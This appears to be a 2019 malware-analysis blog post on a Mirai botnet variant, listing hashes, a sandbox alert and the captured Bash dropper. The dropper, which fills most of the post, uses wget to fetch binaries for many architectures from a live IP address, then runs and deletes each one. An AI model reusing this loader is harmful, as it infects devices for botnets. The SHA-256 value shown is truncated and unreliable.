Wednesday, August 7, 2019

New Mirai Variant (KOR, RU) - Different Architectures incl MIPS & ARMv7



Generic.Bash.MiraiA.72271860

-------------------------------

File Identification

MD5: 43f9fc4fbc043cceda8aab0b596010be
SHA-1: b8ff8c4b7a85be8d67eb21016bda1690a2effc42
SHA-256: 86655593af5eaf3f4055c61a4e86c5b8ac02d330726fbd52dfa2073abc60
----------------
Network capture (sandbox interface virbr0):

Alert: HTTP traffic on port 443 (POST) | Source: 192.168.122.21 | Destination: 178.255.209.22 | Classification: Policy Violation | Signature: HTTPon443
----------------

IP    185.70.105.178


----------------

File Type: Bourne-Again shell script, ASCII text executable

Analysis Date: Jul. 30, 2019, 9:56 AM
Size: 1.818 KB (1818 bytes)
File Classification: SH

AVAST: BV:Downloader-AAN\ [Drp] (Malware infection)

----------------
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i586; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/sparc; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.70.105.178/x86; chmod +x x86; ./x86; rm -rf x86
----------------
